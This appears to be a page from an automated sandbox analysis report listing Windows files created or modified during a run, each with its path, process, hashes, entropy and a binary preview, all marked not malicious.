                                                                                                                                Preview:............f.7.1.c.d.a.e.7.-.f.4.f.8.-.4.f.c.8.-.a.d.0.f.-.e.1.8.e.e.f.9.8.4.d.5.6..................................................9..9.,.w.b5{.A.@........f..i'Y6s.x.G.;8..a.h.MP..+...Ip5w..a..M...y...2?}<.B.;e..46..1B..M,....L[.R.c4..s....>....HP.\.w#..}.B.C... s..N...%.l...i>l,.+...........~......qt.../.....Mw@........f..2.D.T@$....v.U..Vb.R2..(.......N..6........O.c@.s..0...X.0D.;.t.I..K.la}....r4.u*&.....o.f.-..:...o..U.s......................

                                                                                                                                C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):4680
                                                                                                                                Entropy (8bit):3.711185470832321
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:pYMguQII4i66h4aGdinipV9ll7UY5HAmzQ+:9A4q/xne7HO+
                                                                                                                                MD5:F45658D91921C44DE566AF0E4B84EF37
                                                                                                                                SHA1:C33E293E8336D79A72DAEC550E7E3D8510023AED
                                                                                                                                SHA-256:1C4C57A98DE2676E6DAD97EAECFF796A3F4801215799972DDBF1ED83C952E3AF
                                                                                                                                SHA-512:E2210EC29CE7818A0F16DEF0BF614B49296BBE7C03E704B39AE18F9E1B20E9141A68A49E64D5F1C90D81F8EDE3D85648A6F0EA78A1F7F403F325573D392E24A5
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\lsass.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11136
                                                                                                                                Entropy (8bit):7.977985611122021
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:es+vgY7zhnuw+y0Cwnly0iR3C9fTBBVIJylTMJ6ttQfOaRFgIt0TB:ePvFz8w+y0CwnsrC9rBbI+MJ8udi
                                                                                                                                MD5:F0786EF5B77C61BE61EBAA63A9F6932D
                                                                                                                                SHA1:C61F6A785EF6C30B753227A6F996FFD3CA6E8861
                                                                                                                                SHA-256:BC5F7134C8B972E78F34CFE8EE874271D506B25C241D091A659F67D52AD39470
                                                                                                                                SHA-512:A889BAB6D667E2085EFF1A1EE3345AC0ADD3F170631B7E101031CEDD65D5B001898B76BF5691534D7F2B92F161061129A35C67D939FC2A24CC158FEEE8EDC74B
                                                                                                                                Malicious:false
                                                                                                                                Preview:....t+..................z..O.............O....MV... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ....^:.9._.%U..h{.U...R..9<...xZ$............. ....K72.a..[..]W,...w!..h.y9F.Y.V.5p*...h._.::......G...F......)d..........S.0.....%.......%.m...:...Y.`.3...ZDv(....+..!my.z.c.r.7.uk}...E.;.d.w.;.?.O..g....N...g(5..4...q.9.....n.....3..\.`......Z.s`.(..@}x.I5..RXJ..Y..&..&..+{...cJ}.y(6...!..I.....C.....A~.k..I9...}..+m".l./j......R.*..C-..N..4.d.......C.-...S%...C.:7..V.j..C.X.nA.....D.+|.K...{..;.t......"...Q.2.......i.R....1~..........[4.....X..A.!.O.g'..S.Bd....:}..r...1...o...n.j|...Aw.qR.....a>....\&q./.r.I\.Bk.E0.Pd...9XsL.l.../,/9~z......[.4..._w..$s.8......i.5}.(-........u)g..F...i.w...J...7......al.$...r..2..Y;v.....>.E.....S.^[.@..7Q.B..H...[...'O...E...}...../...},. ........."..._<..%.;..S...P...'....7..z.'Y.Cic.....ro...C.~....}..2..Q..-.......A..{..gPBpg..0&..s..w..Fu... .q..L.E...=.Q3..$.RC......h..;.....x..........

                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e...........................................................

                                                                                                                                C:\Windows\System32\winevt\Logs\Application.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5048
                                                                                                                                Entropy (8bit):3.979141422721052
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MXUsfrP+yXCrPwfFRVEfWb3/Ooc0wzytxsIbYmFDSYKniOHE4sTCFDSGiZpQX1OW:lkCrup/vOoclke4FdKnDVGCFBiZsZ
                                                                                                                                MD5:5FB72844E09B58CF2460328376BFEE23
                                                                                                                                SHA1:78400E32B8CECFB903A32D98E0EF3B4DB93D6D34
                                                                                                                                SHA-256:60EA7A79E52BCB630571A7388FBF266A5F157125227739486E98F3C0021D95C0
                                                                                                                                SHA-512:B5B7E33B9F44F5A2953F1971BB8EFF6CC3C28A9CC35C3EC22CA87820902E4F86051828AE79E91E1836625724F8B149F90FB6C0AAD87D6A970FFE65C9B244FD94
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.................\.......^...................nOA>.....................................................................A.m............................................=...........................................................................................................................g...............@...........................n...................M...]...........................j...................................~...................................&...............................................**..X...\.......<...QN.........3d.&........3d....P..k..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 310, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):112680
                                                                                                                                Entropy (8bit):3.7416863928223942
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:qVUHiapX7xadptrDT9W84H6gVUHiapX7xadptrDT9W84H6:lHi6xadptrX9WParHi6xadptrX9WPa
                                                                                                                                MD5:476AE061B56260CCD40FD4B07BD3896D
                                                                                                                                SHA1:7C5345ECF6A18402F2BC6BF66E0AB4891B8A3FFE
                                                                                                                                SHA-256:AE3F292E30105763ADD2729407159EB926CE7257ED19DE83527D09F0954A3FAA
                                                                                                                                SHA-512:4D9AC05ED151D0D8CB66158922582F86620D7D8F5C4E9EBFFE761112FFC85A78B17BE9A4CAD461C3148E3A689D5541E5A2BD9936D347CBD0C04DF93A960063FD
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.................6....................................................................................................I].ElfChnk.........7...............7....................v......................................................................g.u.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.377721629524822
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:fhZN/GN6N/NDsNadNDtNkN6NQNQxNhdNQaNwNwNONPNavNqN6NfNjNALNCNyN7Ns:fZeIPRThtUmqYXL3QXr0Q7
                                                                                                                                MD5:B59AFB7FCA4C7067FBB3EF413064809B
                                                                                                                                SHA1:785A500AA8ADA1D59F3F7FD48E876F2305E7072D
                                                                                                                                SHA-256:ED35583D239B8BBF565E20C872268401F9D05A4DCCE4ABA7F83BA99A5978FD95
                                                                                                                                SHA-512:C86B8AE075AA4E669D9DE8EDC1C3E430D68F1A155153EE7B4C7B1898E03E42334C37FFAE7CD35B759EB019822762C7048083BEA711439FAA1D869360CE59CD88
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.{...............{..........................[.x......................................................................D.\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................=c......................=j...........................?......]...............................................-g..................**......{.......n=.df..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):96496
                                                                                                                                Entropy (8bit):4.272949127967265
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:vVHVRVaVwVvVQPlVbVPVzVXhMVnRVSV3V9VbVSV5VjVMV/V1VQVPTV0V6V6VoVbJ:cPx+HzPvi20Hl6MunW+HzPP
                                                                                                                                MD5:4E47A5C888549CFC2FAFD9DAC84582A3
                                                                                                                                SHA1:6579B4C03A36859EC5B8401E51AE28E77DBF2908
                                                                                                                                SHA-256:A9C8E8AE0D2123CB3BE8CED35F790B19F92F7E9DB12BD3A09AAA4E1932CE8348
                                                                                                                                SHA-512:7BC167C7E57DA39ED3E5CF2AF2EAF5C5B0F3F153F95DF492377162A968CAD48DCC52E7AC2147EB142B17B4EDCE20EC7E1FCF153422DFCC999565BEC4723FCBF6
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.....................................h_..0a...O.i....................................................................%i.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................9@...............................=......**..............r...g..........Z..&...............................................................@.......X..._.!.....E..........@r...g...0.U.f...[2U.f................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........L...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s.A.l.a.r.m.s._.8.w.e.k.y.b.3.d.8.b.b.w.e.....n.d.o....**...............7..g..........Z

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):67008
                                                                                                                                Entropy (8bit):4.182503448607405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:HmHm0hsmsmi7mRXZmVkWmhTimmdmBmKmPhmRTmimZ8mevmcsm7mrmQmzmjmvmTmu:Q2klTiGFKX93WGUGpeOg26
                                                                                                                                MD5:7AAD757C916B34BF737D14C281E91B37
                                                                                                                                SHA1:6E6E1593E10B2AABC34C969342E3EA30F501A461
                                                                                                                                SHA-256:5886A0E49CFFB228FE132F2EAD64BC1217068A6BD52432279DA45A0B05E99881
                                                                                                                                SHA-512:88EC2AB170F24037F14BD8516DC811FF5A7186C5B2DD458C58CCBCD24EDB042C2C7E8EEEC1E8E0F395CFBEC010970FB44CB88F328AA505195CB80E3AD579A2F9
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.@-......o-......@-......o-..........(........1.......................................................................xA.................\...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................5...c#..{1..k:...................v..........**......n-......h...PN.........Z..&...............................................................N.......d..._.!.....[..........@h...PN..0.U.f....2U.f...$.......n-...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c........-.....**......

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 4, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):70680
                                                                                                                                Entropy (8bit):0.7869971179220531
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:PvV7pp8nMLkmp8nPp8njMv+p8nLV7pp8nMLkmp8nPp8njMv+p8n:PvhpiMLxiPijM2iLhpiMLxiPijM2i
                                                                                                                                MD5:1D5F719BE1961F4E1F785DA45503A489
                                                                                                                                SHA1:54E982E975758875D7B3D0A8E3156E7B29334554
                                                                                                                                SHA-256:C27A55A2DE87D103EAA2B3864C12183B39E90D7BEEE46C851660A5C5413037CC
                                                                                                                                SHA-512:86DC8391944B2FB2E682E4D1589A49603885E3D666A3B36601DBA19568C0E0DB2D29394BF5A3AC15F77A5689C806150982029BDDBE46FEFAD6D6849F9756ECE8
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.........................................................................................................................ElfChnk.....................................@.......u.......................................................................=.6............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................f...................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.467947111655398
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:xZPZn2bBN2A4VD7VAx8whAGU2woJQghwMvOUFwe8OQhNwRA:
                                                                                                                                MD5:6B473E7917B1EDEE80CAFE7D24A6A4E8
                                                                                                                                SHA1:1940F41550F2986C928648ED00F9C6E4868D1A23
                                                                                                                                SHA-256:1D52F13D2EA4ACC472815240DBFF0F34C6CD5E86F980D04D9AD28E42C3E7A355
                                                                                                                                SHA-512:9AABAD5B7425A9692545864C11B99DDED0051CE8B442FFAB7BAB21DD8CD68B51BC980B01F324A81C685DC56793581AE2E6751DD08497CCBA64FB3339A9B5483D
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.e.......h.......e.......h...............x....;.......................................................................Z}............................................=...............y...........................................................................................................L...............?...............................................M...F...............................................&...................................................................................n...............**......e..........f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.565838744973026
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:PXY5nVYIyyqED5BVZUe39vHxt1BSocM1:PXY5nVYIyyqED5BVZUe39vHxt1BSot
                                                                                                                                MD5:B30C931B9EF047307E1443502CE7EE14
                                                                                                                                SHA1:BAC3632B709B853DFFCD9C4D65D1F9236F6FE551
                                                                                                                                SHA-256:033CF49641F4E76EFABF8F25753074E7EE72DD567FBA4145D446032D3D9CFADB
                                                                                                                                SHA-512:F5A9CA2D464EBA1F2F4EA426AC3864FB399A8951958BA44BA550E2129C4F4D4DA9E60F0D1B18A07CC76D4BC2CFD20D283F446A47DF990B52916113D5383A1952
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........~...............~...................F..........................................................................T................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................N...............y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17120
                                                                                                                                Entropy (8bit):4.134413581134319
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:PosKFoOoaAxoL+y4omPLoSy+o1oSyrogoSy0oboSyIoroSyOoVoSyBouoSyYozoW:aT
                                                                                                                                MD5:5DE25734332E2AAF2A58135427C13917
                                                                                                                                SHA1:4DB58CAB44EFCEFE0616181A77E8EE8E18A78A63
                                                                                                                                SHA-256:E443BB0D81AB77A313025EB6E6E92230EC4B28C01153D6E931EA18E4E02475B4
                                                                                                                                SHA-512:51E48EEE59A00BFEE19A27F4EA3F65F75B87DE67D81C0D7104D2ACC7BA8114CE9E37E30BAAACEDDA8E1BF9E7B49D191266FB89BE1AC1FAFE797B2667ECC0DF9C
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................+...-....H?......................................................................h.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ......U)..............................**..................PN.........Z... ..............................................................>.......V...X.!..e..................PN..0.U.f....4U.f................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.8511209646626153
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ChAiPA5PNPxPEPHPhPEPmPSPRP3PoPbPfP0bPnPdP:C2NZ
                                                                                                                                MD5:A98C811B8E1B821CD1FE05A68ADD446A
                                                                                                                                SHA1:4E8B739F5E308F943962E72FF24212FFBE47FAD7
                                                                                                                                SHA-256:58F6584C100174B80ACB8940226841B77884326A293CEE9072F4DD4CF8C10133
                                                                                                                                SHA-512:24A7B9C86A6CE93B9B7F4107A433A247789EE568EB69E301B51DC9D01AA40D2F408AD76B78F7F83E5F4EB47C1677276BC86F86A99BAB95186C2331ABE4CA523C
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................%...&..?........................................................................<.m................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ..............'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.8431535491551847
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:OhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:OWXSYieD+tvgzmMvRQAsNi
                                                                                                                                MD5:106F006ACA6287586EF71A10A5C06C4D
                                                                                                                                SHA1:B4B6D91FF53E9BDFC8D0D99A0D6F643E49074932
                                                                                                                                SHA-256:79E64A943AED80ADAE43934E4573F95AE7308DDD6FC896EEDDB386C8A41FBA65
                                                                                                                                SHA-512:F4D49C8CBC2B46719521935DFABDC3E05883C2360D4E472920C420B1ACC74D0F835D10A2C5BA6E29038425809D585025172FDC9E534619C017D70FA4D9F23D53
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................$...&..{n.8.....................................................................{..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):105296
                                                                                                                                Entropy (8bit):3.7685977795252974
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:q2hjhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqj:qsbCyhLfIIbqbCyhLfIIbl
                                                                                                                                MD5:192A58419A8B1111BFC94BCC037F4E2A
                                                                                                                                SHA1:E94051714D659412671C022475748881EA4B5F85
                                                                                                                                SHA-256:55A1DC4C256A6D2E0D01D4A65398839C8BD74C7D967F23061B2DF49A8FD07358
                                                                                                                                SHA-512:16949970D7DAB1AAA3CAAB207696309388EAE2BFC57F35855A8089D1721457E39EA6B1D99EBF6D5F5A04F7C22401CBDE8804A0324217F833078A8A2B75A04793
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........K...............K...........H...0............................................................................;..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**......K.........m.PN.........Z...{..............................................................<.......T.....!...................m.PN..0.U.f.....U.f...........K....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`....GR...N..?....NC.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):113176
                                                                                                                                Entropy (8bit):3.742611562476744
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:5cMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9HhrwcMhFBuyKskZljdoKXjtT/r1H:CMhFBuVoMhFBuVZ
                                                                                                                                MD5:0D7BB6AB1D197EEA76CB0C854E685B2B
                                                                                                                                SHA1:4EEC0DBE094F43F0896C2DA462DB7865362C6B14
                                                                                                                                SHA-256:C2D9C106AF23892D9BDDC1373E796D1E2DE8B8BE689454FCC5E976E966B4A57C
                                                                                                                                SHA-512:11F5D34D1A6783D5295248CFD2F6B21B4A28895CDC6EBC4FDCE77D03350D156CB4DAC6ACCC5F7D445C231A1C94D3804A785458C8CC9AEDB49E9D36ECB949141C
                                                                                                                                Malicious:false
